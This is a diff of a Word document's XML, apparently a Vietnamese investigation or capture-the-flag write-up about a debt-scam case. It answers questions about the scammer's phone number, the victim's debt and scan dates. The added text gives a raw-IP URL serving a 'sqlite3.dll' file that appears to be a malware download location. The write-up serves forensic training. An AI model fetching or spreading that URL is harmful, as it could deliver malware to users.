-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>caller</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>lot</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>of</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>money</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>but</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>couldn't</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>repay</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>now</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">". </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>How</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>much</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>does</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>victim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>owe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>this</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>person</w:t>
+        <w:t>with</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2278,24 +1575,90 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="35"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t> Tin nhắn được gửi từ số +201172137258 và bao gồm yêu cầu trả một khoản nợ lớn.</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Scanned</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> đầu tiên vào lúc </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>2025-06-23</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> UTC </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">và có URL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>path</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> “</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId7" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>http://171.22.28.221/9e226a84ec50246d/sqlite3.dll</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>”</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2312,11 +1675,80 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Và lần thứ 2 cũng chính là đáp án, vào lúc </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>2026-09-13</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> UTC có URL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>path</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>http://171.22.28.221/9e226a84ec50246d/sqlite3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>dll”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12DD73AA" wp14:editId="03215E0A">
-            <wp:extent cx="5943600" cy="2867025"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="430718414" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35EA0D91" wp14:editId="0B568B50">
+            <wp:extent cx="5943600" cy="2874645"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="501408301" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2324,285 +1756,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="430718414" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2867025"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Top of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Bottom of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Q3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>What</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>is</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>of</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>person</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>whom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>victim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>owes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>money</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FCD511E" wp14:editId="7DDCD620">
-            <wp:extent cx="5943600" cy="2842895"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="238980248" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="238980248" name=""/>
+                    <pic:cNvPr id="501408301" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -2614,7 +1768,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2842895"/>
+                      <a:ext cx="5943600" cy="2874645"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2626,15 +1780,6 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Top of Form</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2652,90 +1797,79 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Bottom of Form</w:t>
+        <w:t>Top of Form</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Top of Form</w:t>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q3</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
